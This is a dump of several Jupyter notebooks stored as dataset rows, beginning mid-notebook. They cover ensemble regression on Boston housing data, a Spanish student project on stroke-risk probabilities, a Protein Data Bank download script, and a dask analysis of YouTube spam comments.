"from sklearn.ensemble import RandomForestRegressor\n\nrf_reg = RandomForestRegressor(n_estimators=500, n_jobs=-1, max_depth=10)\nrf_reg.fit(train_X, train_y)\npred_y = rf_reg.predict(test_X)\n\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(rf_reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"MAE = 4.953366204278773\n"
]
],
[
[
"## Random Forest Regressor: Feature Importance and Out of Bag Validation Score\n\nThis example shows a random forest regressor using decision trees constrained to a maximum depth of 10. Out of bag score is enabled. ",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import RandomForestRegressor\n\nrf_reg = RandomForestRegressor(n_estimators=500, n_jobs=-1, max_depth=10, oob_score=True)\nrf_reg.fit(train_X, train_y)\n\nfor name, score in zip(boston_housing_data.feature_names, rf_reg.feature_importances_):\n print(name, score)\n \nprint(\"\\n\\nOut of Bag Validation:\", rf_reg.oob_score_)",
"CRIM 0.03371132769475889\nZN 0.001516399035147252\nINDUS 0.006348373160781681\nCHAS 0.000803948528826991\nNOX 0.02664378861555026\nRM 0.4497024039614303\nAGE 0.02170768047239195\nDIS 0.0569814063146847\nRAD 0.004394095389350596\nTAX 0.012188515025893831\nPTRATIO 0.016232410175830058\nB 0.011378951616129644\nLSTAT 0.3583907000092238\n\n\nOut of Bag Validation: 0.8100208177458713\n"
]
],
[
[
"## AdaBoost Regression Example\n\nImplmentation of an AdaBoost ensemble regressor with decision trees of max depth = 2 and 100 estimators in sequence. Learning rate is decreased to 0.2 to improve generalization. \n\nThis example implements an AdaBoost regressor. It shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.tree import DecisionTreeRegressor\n\n#Ada Boost Regressor \nreg = AdaBoostRegressor(\n DecisionTreeRegressor(max_depth=2), \n n_estimators=100,\n learning_rate=0.2)\n\nreg.fit(train_X, train_y)\npred_y = reg.predict(test_X)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"MAE = 3.4724523088696753\n"
]
],
[
[
"## Gradient Boosting Regressor Example\n\nThis example implements an Gradient Boosting regressor. Its ensemble of 200 estimators are decision stumps.\n\n\nIt shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import GradientBoostingRegressor\n\nreg = GradientBoostingRegressor(max_depth=1, n_estimators=50)\n\nreg.fit(train_X, train_y)\npred_y = reg.predict(test_X)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"MAE = 3.3445466597845\n"
]
],
[
[
"## Gradient Boosting Regressor Example with early stopping\n\nThis example implements an Gradient Boosting regressor with early stopping enabled. It shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import GradientBoostingRegressor\n\n\n# Split the training into a training and validation set\nX_train, X_val, y_train, y_val = train_test_split(train_X_data, train_y_data)\n\nmax_tree_depth=1\n\nreg = GradientBoostingRegressor(max_depth=max_tree_depth, n_estimators=1000)\nreg.fit(X_train, y_train)\n\nerrors = [mean_squared_error(y_val, y_pred)\n for y_pred in reg.staged_predict(X_val)]\nbst_n_estimators = np.argmin(errors)\n\nprint(\"Best Number of Estimators:\" + str(bst_n_estimators))\n\nreg = GradientBoostingRegressor(max_depth=max_tree_depth, n_estimators=bst_n_estimators)\n\n##\n\nreg.fit(train_X, train_y)\npred_y = reg.predict(test_X)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"Best Number of Estimators:337\nMAE = 2.7971391773570042\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb5204cba78f9995d06bf118079270da6d653dbb | 198,179 | ipynb | Jupyter Notebook | Entrega 1 proyecto.ipynb | Tonydesanty/Proyecto-entrega-1 | 57038a301546d9d9f0d540d2cc11470ac08cf46f | [
"MIT"
] | null | null | null | Entrega 1 proyecto.ipynb | Tonydesanty/Proyecto-entrega-1 | 57038a301546d9d9f0d540d2cc11470ac08cf46f | [
"MIT"
] | null | null | null | Entrega 1 proyecto.ipynb | Tonydesanty/Proyecto-entrega-1 | 57038a301546d9d9f0d540d2cc11470ac08cf46f | [
"MIT"
] | 1 | 2021-06-24T20:03:33.000Z | 2021-06-24T20:03:33.000Z | 106.319206 | 57,524 | 0.807856 | [
[
[
"<img style=\"float: left; margin: 30px 15px 15px 15px;\" src=\"https://pngimage.net/wp-content/uploads/2018/06/logo-iteso-png-5.png\" width=\"300\" height=\"500\" /> \n \n \n### <font color='navy'> Simulación de procesos financieros. \n\n**Nombres:** Ana Esmeralda Rodriguez Rodriguez, Antonio de Santiago Rosas Saldaña.\n\n**Fecha:** 09 de marzo del 2021.\n\n**Expediente** : If709288, Af713803.\n**Profesor:** Oscar David Jaramillo Zuluaga.\n \n**Link Github**: Lhttps://github.com/Tonydesanty/Proyecto-entrega-1/blob/main/Entrega%201%20proyecto.ipynb\n\n# Proyecto TEMA-2",
"_____no_output_____"
],
[
"**Introducción:**\n\nHoy en día existen diferentes tipos de enfermedades letales como el cáncer, coronavirus, diabetes, entre otros. Nuestro proyecto va a ir enfocado a los accidentes cerebrovasculares, el cual ocupa el segundo puesto de las enfermedades más mortales de la actualidad.\n\nUna lesión cerebrovascular es un tipo de lesión que se hace presente cuando el flujo sanguíneo del cerebro se detiene parcialmente. Cuando el flujo sanguíneo en el cerebro se detiene, el cerebro deja de recibir la oxigenación y los nutrientes que requiere para su funcionamiento y las células y neuronas comienzan a morir de manera rápida.\nFactores que pueden influir a tener un accidente cerebrovascular:\n\n•\tPresión arterial alta.\n\n•\tDiabetes.\n\n•\tEnfermedades en el corazón.\n\n•\tFumar.\n\n•\tGenética.\n\n•\tEdad.\n\n•\tConsumo de alcohol.\n\n•\tConsumo de drogas.\n\n•\tColesterol.\n\n•\tObesidad.\n\n ",
"_____no_output_____"
],
[
"**Objetivo general:**\n\nCrear un modelo el cuál nos de un diagnostico si una persona es poseedora de una enfermedad cerebrovascular.\n\n**Objetivos secundarios:**\n\n1.Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por su edad.\n\n2.-Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por su nivel de masa corporal.\n\n3.- Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por su nivel de glucosa.\n\n4.- Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por tener la costumbre de fumar.\n\n",
"_____no_output_____"
],
[
"**Definición del problema**:\n\nLas enfermedades son algo natural dentro del ciclo de vida de una persona, existen diferentes enfermedades que contrae la gente, ya sea por sus hábitos, estado psicologico, o edad. Las enfermedades cerebrovasculares son un problema en la actualidad ya que son la segunda enfermedad con mayor tasa de mortalidad, despúes de la cardipatía isquémica. \n\nCrear un modelo que nos ayude a encontrar la probabilidad que una persona contraiga en un futuro una enfermedad cerbrovascular sería muy interesante, ya que, podremos pronosticar si una persona podría a llegar a tener una enfermedad de este tipo con caracteristicas como edad y su índice de masa corporal, y así adelantarnos a los hechos y poder tomar decisiones para poder reducir la probabilidad de contraer esta enfermedad.\n\n\nA través de una base de datos obtenida de \"https://www.kaggle.com/fedesoriano/stroke-prediction-dataset?select=healthcare-dataset-stroke-data.csv\" trabajaremos para poder crear un modelo el cuál nos permita predecir si una persona con ciertas caractericticas puede llegar a ser poseedora de una enfermedad cerebrovascular.\n",
"_____no_output_____"
],
[
"**Nodos a simular:**\n\n*Probabilidad de contraer por su edad*: Decidimos simular está variable porque consideramos que la edad o el estado del cuerpo tiene gran impacto al momento de contraer enfermedad, a mayor edad, mayor posibilidad de contraer enfermedades.\n\n*Probabilidad de contraer por su índice de masa corporal:* La masa corporal de las personas es un indicador de salud, normalmente las personas con mayor masa corporal son las más propensas a contraer enfermedades, por lo que tomar este indicador como nodo es muy importante ya que creemos que puede a llegar a influir de manera considerable en nuestros resultados.\n\n*Probabildiad de contraer por sus habitos con el cigarro*: Los cigarros son nido de varias enfermedades, por lo que es interesante saber cuál es la probabilidad de contrarer la enfermedad por tus hábitos con el cigarro.\n\n*Probabilidad mediante su nivel de glucosa*: La gluscosa es un indicador de cuanta azúcar tenemos dentro de nuestro cuerpo, tener un nivel de azúcar regulado es lo más optimo, sin embargo, cuando esta sube o baja son indicadores de que puedes tener enfermedades como diabetes, analizar esta variable puede llegarnos a dar un resultado más aproximado del cual queremos llegar.\n",
"_____no_output_____"
],
[
"**Hipotesis** \n\nLas personas más probables de contraer enfermedades cerebrovasculares son aquellas que tienen más de 70 años, fuman, tienen un alto índice de masa corporal y nivel de glucosa bajo.\n\n*Supuestos:*\n\nLas variables que simularemos son las más significativas al momento del estudio de esta enfermedad.\n\nToda la información proporcionada por los pacientes son 100% reales.\n\nOtro tipo de enfermedades no tienen un peso relativo dentro del estudio.\n\nLas variables a analizar no tienen precedentes importante (En caso de masa corporal y glucosa).\n\nLas variables tienen el mismo peso al momento de presentar resultados.\n",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"## Visualización de datos\n",
"_____no_output_____"
]
],
[
[
"#Librerias\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport collections\nimport scipy.stats as st\nfrom collections import Counter",
"_____no_output_____"
],
[
"from statsmodels.nonparametric.kernel_density import KDEMultivariate\n\n# funcion que retorna una funcion de densidad de probabilidad de un conjunto de datos\ndef kde_statsmodels_mf(x, **kwargs):\n \"\"\"Multivariate Kernel Density Estimation with Statsmodels\"\"\"\n kde = KDEMultivariate(x, \n bw='cv_ml',\n var_type='c', **kwargs)\n return lambda x_grid: kde.pdf(x_grid)",
"_____no_output_____"
],
[
"data = pd.read_csv('healthcare-dataset-stroke-data.csv')\ndata",
"_____no_output_____"
],
[
"clean_data = pd.DataFrame()\n# Filtrar las variables a analizar\nclean_data['age'] = data.T.loc['age']\nclean_data['smoking_status'] = data.T.loc['smoking_status']\nclean_data['bmi'] = data.T.loc['bmi']\nclean_data['wor_type'] = data.T.loc['work_type']\n# Invertir datos para tener los valores iniciales al principio\nclean_data = clean_data.iloc[::-1] \n# Reemplazar index por uno que tenga los vlores de forma descendiente\nclean_data['index'] = [i for i in range(len(clean_data['age']))]\nclean_data.set_index('index', inplace = True)\n# Eliminar hasta primer positivo\nclean_data = clean_data.iloc[37:,:]\n# llenar valores nulos\nclean_data.fillna(0,inplace = True)\n# Mostrar la cola del data frame\nclean_data",
"_____no_output_____"
]
],
[
[
"## Edad",
"_____no_output_____"
]
],
[
[
"totalages = clean_data['age']\ntotalages.head()",
"_____no_output_____"
],
[
"# plotear histograma de los datos\n\nJ = 10 # Cantidad de particiones del histograma\n[freq, x_hist, _] = plt.hist(totalages,bins = J, density = True ); # histograma\nplt.show() # mostrar histograma\nx_hist = x_hist[1:] # Se obvia el último valor de x para obtener exactamente J muestras de x\n",
"_____no_output_____"
],
[
"age = totalages\n\n# Probar diferentes distirbuciones de probabilidad\ndist_list = ['bradford', 'beta','expon', 'exponnorm','norm','uniform','foldnorm', 'gennorm', 'ksone', 'kappa4', 'johnsonsb']\n\ny_real, x_real, _ = plt.hist(age, bins = 15, density = True) #hacer histograma\n\nx_real = x_real[1:] # modificar shape para que rea igual\n\n#e = []\ndef distribucion(dist_list):\n \n def imprimir(dist):\n param = getattr(st, dist).fit(age)\n y_est = getattr(st, dist).pdf(x_real, *param)\n plt.plot(x_real,y_est, label = dist);\n print('El error de la distribucion', dist,'es de', (abs(y_real-y_est)*100/y_est).mean(),'%')\n \n [imprimir(dist) for dist in dist_list]\n\n\ndistribucion(dist_list)\nplt.legend()\nplt.show()",
"El error de la distribucion bradford es de 17.933979416705725 %\nEl error de la distribucion beta es de 22.647339806234722 %\nEl error de la distribucion expon es de 95.42359157800738 %\nEl error de la distribucion exponnorm es de 44.8434298758337 %\nEl error de la distribucion norm es de 44.84491981007708 %\nEl error de la distribucion uniform es de 17.173270254287402 %\n"
],
[
"param = getattr(st, 'ksone').fit(x_hist) # obtener los parametros\npi = st.ksone.pdf(x_hist, *param)\n# Cálculo de la esperanza usando la expresión teórica\nEi = x_hist*pi\n\n# Cálculo teórico de la chi cuadrada\nx2 = ((freq - Ei)**2 / Ei).sum()\nprint('Valor de chi cuadrado teorico = ', x2)\n\n# Cálculo usando la librería estadística de la chi cuadrada\nX2 = st.chisquare(freq, Ei)\nprint('Valor de chi cuadrado librería = ', X2)\n\n# Cálculo de Grados de libertad del estadístico\nm = J-1 # grados de libertad\n\nChi_est = st.chi2.ppf(q=0.95, df=m)\nprint('Estadístico de chi_cuadrado = ', Chi_est)",
"Valor de chi cuadrado teorico = 5.577598299643628\nValor de chi cuadrado librería = Power_divergenceResult(statistic=5.577598299643628, pvalue=0.7813356619723271)\nEstadístico de chi_cuadrado = 16.918977604620448\n"
],
[
"func_edad = kde_statsmodels_mf(age)\nx_g = np.arange(0,100,100)\nplt.figure()\nplt.plot(x_g,func_edad(x_g));\nplt.hist(edad,bins = 15, density = True);\nplt.show()",
"C:\\Users\\Santiago\\anaconda3\\lib\\site-packages\\statsmodels\\nonparametric\\kernel_density.py:158: RuntimeWarning: invalid value encountered in log\n L += func(f_i)\n"
],
[
"f = func_edad\n# encontrar el maximo de la funcion y plotearlo\nx = np.arange(0,10000,100)\nmax_fp = f(optimize.fmin(lambda x:-f(x),0,disp=False))\nplt.plot(0,max_fp,'x',lw = 10)\nplt.plot(x,func_edad(x))",
"_____no_output_____"
]
],
[
[
"## Funciones a utilizar",
"_____no_output_____"
]
],
[
[
"# Función de aceptación y rechazo usando una constante para t(x) y se desea que dicha función regrese\n# N variables aleatorias (Exactamente que acepte N valores)\ndef acep_rechazo_simplificada(\n N:'Cantidad de variables a generar',\n Dom_f:'Dominio de la función f como tupla (a,b)',\n f:'función objetivo a generar',\n max_f:'máximo valor de f'\n):\n X = np.zeros(N)\n\n return X",
"_____no_output_____"
],
[
"def histograma_vs_densidad(signal:'variable con muestras aleatorias de la distribución generada',\n f:'función de distribución de probablidad f(x) de la variable aleatoria'):\n\n plt.figure(figsize=(8,3))\n count, x, _ = plt.hist(signal,100,density=True)\n y = f(x)\n plt.plot(x, y, linewidth=2,color='k')\n plt.ylabel('Probabilidad')\n plt.xlabel('Muestras')\n# plt.legend()\n plt.show()",
"_____no_output_____"
],
[
"def Gen_distr_discreta(p_acum: 'P.Acumulada de la distribución a generar',\n indices: 'valores reales a generar aleatoriamente',\n N: 'cantidad de números aleatorios a generar'):\n \n U =np.random.rand(N)\n # Diccionario de valores aleatorios\n rand2reales = {i: idx for i, idx in enumerate(indices)}\n\n # Series de los valores aletorios\n y = pd.Series([sum([1 for p in p_acum if p < ui]) for ui in U]).map(rand2reales)\n\n return y",
"_____no_output_____"
],
[
"def plot_histogram_discrete(distribucion:'distribución a graficar histograma',\n label:'label del legend'):\n # len(set(distribucion)) cuenta la cantidad de elementos distintos de la variable 'distribucion'\n plt.figure(figsize=[8,4])\n y,x = np.histogram(distribucion,density = True,bins = len(set(distribucion)) - 1) \n plt.bar(list(set(distribucion)),y,label=label)\n plt.legend()\n plt.show()",
"_____no_output_____"
]
],
[
[
"## Nodo 1 \"Edad\"",
"_____no_output_____"
]
],
[
[
"edad = data['age']\nprint('La media de tener un problema cerebrovascular es de:', edad.mean())\n",
"La media de tener un problema cerebrovascular es de: 43.21526418786693\n"
],
[
"plt.hist(edad, density=True, bins=82)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Edad del Paciente')\nplt.show()",
"_____no_output_____"
],
[
"#Calculo de probabilidad\nlista_edad=pd.DataFrame(edad)\ncantidad_edad = pd.value_counts(lista_edad[\"age\"])\ncantidad_edad\n#robabilidad_edad=pd.DataFrame((cantidad_edad/5110)*100)\n#robabilidad_edad\n#Age.sort_index().head(83)\n#dad_acumulada=np.cumsum(probabilidad_edad)\n#dad_acumulada\nproba_edad= ((cantidad_edad/5110)*100)\nproba_edad\nacumulada_edad = np.cumsum(proba_edad)\nacumulada_edad",
"_____no_output_____"
],
[
"info= pd.DataFrame({'Cantidad por edad':cantidad_edad, 'Probabilidad por edad':proba_edad, 'Probabilidad acumulada': acumulada_edad})\ninfo\n",
"_____no_output_____"
],
[
"# nombrar variable que contenga datos del df determinados\ntotal_age = info['cantidad por edad']\ntotal_age.head()",
"_____no_output_____"
]
],
[
[
"## Nodo 2 \"Masa\"",
"_____no_output_____"
]
],
[
[
"masa = data['bmi']\nprint('La media de tener un problema cerebrovascular es de:', masa.mean())\n",
"La media de tener un problema cerebrovascular es de: 28.893236911794673\n"
],
[
"plt.hist(masa, density=True, bins=20)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Masa muscular del paciente')\nplt.show()",
"_____no_output_____"
],
[
"lista_masa=pd.DataFrame(masa)\ncantidad_masa = pd.value_counts(lista_masa[\"bmi\"])\ncantidad_masa\nproba_masa= ((cantidad_masa/4909)*100)\nproba_masa\nacumulada_masa = np.cumsum(proba_masa)\nacumulada_masa",
"_____no_output_____"
],
[
"info_masa= pd.DataFrame({'Cantidad por masa':cantidad_masa, 'Probabilidad por masa':proba_masa, 'Probabilidad acumulada masa': acumulada_masa})\ninfo_masa",
"_____no_output_____"
]
],
[
[
"## Nodo 3 \"Fumar\"",
"_____no_output_____"
],
[
"**Para el caso del nodo \"Fumar\" se van a tener estos códigos:**\n\n0.- No se sabe si el paciente fuma o no.\n\n1.- Fuma de vez en cuando.\n\n2.- Nunca ha fumado.\n\n3.- Fuma",
"_____no_output_____"
]
],
[
[
"fuma = data['smoking_status']\nprint('La media de tener un problema cerebrovascular es de:', masa.median())",
"La media de tener un problema cerebrovascular es de: 28.1\n"
],
[
"plt.hist(fuma, density=True, bins=4)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Costumbres de fumar del paciente')\nplt.show()",
"_____no_output_____"
],
[
"lista_fuma=pd.DataFrame(fuma)\ncantidad_fuma = pd.value_counts(lista_fuma[\"smoking_status\"])\ncantidad_fuma\nproba_fuma= ((cantidad_fuma/5110)*100)\nproba_fuma\nacumulada_fuma = np.cumsum(proba_fuma)\nacumulada_fuma\n",
"_____no_output_____"
],
[
"info_fuma= pd.DataFrame({'Cantidad por fumar':cantidad_fuma, 'Probabilidad por fumar':proba_fuma, 'Probabilidad acumulada fuma': acumulada_fuma})\ninfo_fuma",
"_____no_output_____"
]
],
[
[
"## Nodo 3 \"Glucosa\"",
"_____no_output_____"
]
],
[
[
"glucosa = data['avg_glucose_level']\nprint('La media de tener un problema cerebrovascular es de:', glucosa.mean())",
"La media de tener un problema cerebrovascular es de: 106.09534246575328\n"
],
[
"plt.hist(glucosa, density=True, bins=20)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Glucosa del paciente')\nplt.show()",
"_____no_output_____"
],
[
"lista_glucosa=pd.DataFrame(glucosa)\ncantidad_glucosa = pd.value_counts(lista_glucosa[\"avg_glucose_level\"])\ncantidad_glucosa\nproba_glucosa= ((cantidad_glucosa/5110)*100)\nproba_glucosa\nacumulada_glucosa = np.cumsum(proba_glucosa)\nacumulada_glucosa\n\n\n",
"_____no_output_____"
]
],
[
[
"## Nodo 4 \"Por tipo de trabajo\"",
"_____no_output_____"
],
[
"**Códigos para tipo de trabajo:**\n\n0.- Niños.\n\n1.- Trabajo en el gobierno\n\n2.- Nunca ha trabajado\n\n3.- Privado\n\n4.- Autoempleado",
"_____no_output_____"
]
],
[
[
"trabajo = data['work_type']\nprint('La media de tener un problema cerebrovascular es de:', trabajo.median())",
"La media de tener un problema cerebrovascular es de: 3.0\n"
],
[
"plt.hist(trabajo, density=True, bins=5)\nplt.xlabel('Rango ')\nplt.ylabel('Frecuencia')\nplt.title('Tipo de trabajo del paciente')\nplt.show()",
"_____no_output_____"
],
[
"lista_trabajo=pd.DataFrame(trabajo)\ncantidad_trabajo = pd.value_counts(lista_trabajo[\"work_type\"])\ncantidad_trabajo\nproba_trabajo= ((cantidad_trabajo/5110)*100)\nproba_trabajo\nacumulada_trabajo = np.cumsum(proba_trabajo)\nacumulada_trabajo",
"_____no_output_____"
],
[
"info_trabajo= pd.DataFrame({'Cantidad por trabajo':cantidad_trabajo, 'Probabilidad por trabajo':proba_trabajo, 'Probabilidad acumulada trabajo': acumulada_trabajo})\ninfo_trabajo",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb5211717dd267ecc21b1778db4f924909fcaa03 | 7,196 | ipynb | Jupyter Notebook | Python for Data Science/Week_Files/Week-9-ExampleNotebooks/Week-9-ExampleNotebooks/Protein Data Bank Notebooks/.ipynb_checkpoints/Final PDB Pull-checkpoint.ipynb | mattssilva/Data-Science-Micromasters | 727d93adacfd8fcd1504631f3b39419323d1c81b | [
"Apache-2.0"
] | 10 | 2019-09-09T15:53:39.000Z | 2022-01-15T19:35:41.000Z | DSE200x/Week-9-ExampleNotebooks/Protein_Data_Bank_Notebooks/.ipynb_checkpoints/Final PDB Pull-checkpoint.ipynb | kabartay/EdX-UCSanDiegoX-DSE200x | 58d7d655e2557fa142e245e5875a9c24b1194280 | [
"MIT"
] | null | null | null | DSE200x/Week-9-ExampleNotebooks/Protein_Data_Bank_Notebooks/.ipynb_checkpoints/Final PDB Pull-checkpoint.ipynb | kabartay/EdX-UCSanDiegoX-DSE200x | 58d7d655e2557fa142e245e5875a9c24b1194280 | [
"MIT"
] | 2 | 2020-07-26T16:19:03.000Z | 2021-07-10T14:21:59.000Z | 24.899654 | 365 | 0.570039 | [
[
[
"!pwd",
"/Users/DZD/Data Visualization/Final/Coursera Materials\r\n"
],
[
"import requests\nimport csv",
"_____no_output_____"
],
[
"###Create string name list from avaliable fields: http://www.rcsb.org/pdb/results/reportField.do\n###Custom Report Web Services General info: http://www.rcsb.org/pdb/software/wsreport.do\nse= \"ndbId\"\nstring_names = \"classification,experimentalTechnique,macromoleculeType,residueCount,resolution,\"+\\\n \"structureMolecularWeight,\"+\\\n \"crystallizationMethod,crystallizationTempK,densityMatthews,densityPercentSol,\"+\\\n \"pdbxDetails,phValue,publicationYear\"\n \nsequences_string_names = \"sequence,residueCount,macromoleculeType\"",
"_____no_output_____"
],
[
"#Main Pull\npayload = {'pdbids': '*','service': 'wsfile', 'format': 'csv', 'primaryOnly': '1', 'CustomReportColumns':string_names}\nr = requests.get('http://www.rcsb.org/pdb/rest/customReport', params=payload)",
"_____no_output_____"
],
[
"r.url",
"_____no_output_____"
],
[
"r.text.splitlines()[0]",
"_____no_output_____"
],
[
"string_names.split(\",\")",
"_____no_output_____"
],
[
"#writing the main pull\noutput_reader = csv.reader(r.text.splitlines())\nwith open('pdb_data_no_dups.csv', 'wb') as csvfile:\n csv_writer = csv.writer(csvfile)\n for row in output_reader:\n csv_writer.writerow(row)",
"_____no_output_____"
],
[
"len(r.text.splitlines())",
"_____no_output_____"
],
[
"!pwd",
"/Users/DZD/Data Visualization/Final\r\n"
],
[
"#sequence pull\npayload_seq = {'pdbids': '*','service': 'wsfile', 'format': 'csv', 'primaryOnly': '1', 'CustomReportColumns':sequences_string_names}\nr_seq = requests.get('http://www.rcsb.org/pdb/rest/customReport', params=payload_seq)",
"_____no_output_____"
],
[
"#write sequence pull\noutput_reader_seq = csv.reader(r_seq.text.splitlines())\nwith open('pdb_data_seq.csv', 'wb') as csvfile:\n csv_writer_seq = csv.writer(csvfile)\n for row in output_reader_seq:\n csv_writer_seq.writerow(row)",
"_____no_output_____"
]
],
[
[
"reports = \"StructureSummary,Sequence,Ligands,BindingAffinity,BiologicalDetails,ClusterEntity,\"+\\\n \"Domains,Crystallization,UnitCellDimensions,DataCollectionDetails,RefinementDetails\"+\\\n \"refinementParameters,NmrSoftware,NmrSpectrometer,NMRExperimentalSampleConditions,NmrRepresentative\"+\\\n \"NMRRefinement,NmrEnsemble,EMStructure,Citation,OtherCitations,SGProject\"",
"_____no_output_____"
],
[
"payload_all = {'pdbids': '*','service': 'wsfile', 'format': 'csv', 'primaryOnly': '1', 'reportName':reports}\nr_all = requests.get('http://www.rcsb.org/pdb/rest/customReport', params=payload_all)\noutput_reader_all = csv.reader(r_all.text.splitlines())\nwith open('pdb_data_all.csv', 'wb') as csvfile:\n csv_writer = csv.writer(csvfile)\n for row in output_reader:\n csv_writer.writerow(row)",
"_____no_output_____"
],
[
"r_all.url",
"_____no_output_____"
]
]
] | [
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
cb5218874a291a46d35d3aae8e536dda3940810e | 92,940 | ipynb | Jupyter Notebook | Parts_1_and_2 (2).ipynb | wjarvis2/DS-Unit-3-Sprint-3-Big-Data | 4706362317be8eae6ac888003390dfac40060bec | [
"MIT"
] | null | null | null | Parts_1_and_2 (2).ipynb | wjarvis2/DS-Unit-3-Sprint-3-Big-Data | 4706362317be8eae6ac888003390dfac40060bec | [
"MIT"
] | null | null | null | Parts_1_and_2 (2).ipynb | wjarvis2/DS-Unit-3-Sprint-3-Big-Data | 4706362317be8eae6ac888003390dfac40060bec | [
"MIT"
] | null | null | null | 41.959368 | 1,124 | 0.445094 | [
[
[
"import dask.dataframe as dask",
"_____no_output_____"
],
[
"dask_df = dask.read_csv(\"*.csv\")",
"_____no_output_____"
],
[
"dask_df",
"_____no_output_____"
],
[
"dask_df.head()",
"_____no_output_____"
],
[
"# Elnino Melendez sounds like she has some real wholesome, family-friendly content on her channel",
"_____no_output_____"
],
[
"dask_df.count().compute()",
"_____no_output_____"
],
[
"dask_df.columns",
"_____no_output_____"
],
[
"len(dask_df)",
"_____no_output_____"
],
[
"# Looks like 1956 instances (rows) and 5 features (columns)",
"_____no_output_____"
],
[
"dask_df['CLASS'].value_counts().compute()",
"_____no_output_____"
],
[
"# Looks like 1005 instances of spam and 951 of non-spam",
"_____no_output_____"
],
[
"dask_df['CONTENT'].str.lower().compute()[1:5]",
"_____no_output_____"
],
[
"spam = dask_df[(dask_df['CLASS'] == 1)].compute()",
"_____no_output_____"
],
[
"spam",
"_____no_output_____"
],
[
"len(spam)",
"_____no_output_____"
],
[
"# The 1005 spam comments",
"_____no_output_____"
],
[
"spam['CONTENT'].str.lower().str.contains('check').value_counts()",
"_____no_output_____"
],
[
"high_quality_non_spam_content = dask_df[(dask_df['CLASS'] == 0)].compute()",
"_____no_output_____"
],
[
"high_quality_non_spam_content",
"_____no_output_____"
],
[
"high_quality_non_spam_content['CONTENT'].str.lower().str.contains('check').value_counts()",
"_____no_output_____"
],
[
"# Yep. Looks like saying \"Check out ....!\" is a dead giveaway",
"_____no_output_____"
],
[
"# Instead, maybe they should utilize a colloquialism like \"Take a gander at ...!\"",
"_____no_output_____"
],
[
"high_quality_non_spam_content['CONTENT'].str.lower().str.contains('gander').value_counts()",
"_____no_output_____"
],
[
"spam['CONTENT'].str.lower().str.contains('gander').value_counts()",
"_____no_output_____"
],
[
"# Yep, looks like they just need to switch up their vernacular a bit ",
"_____no_output_____"
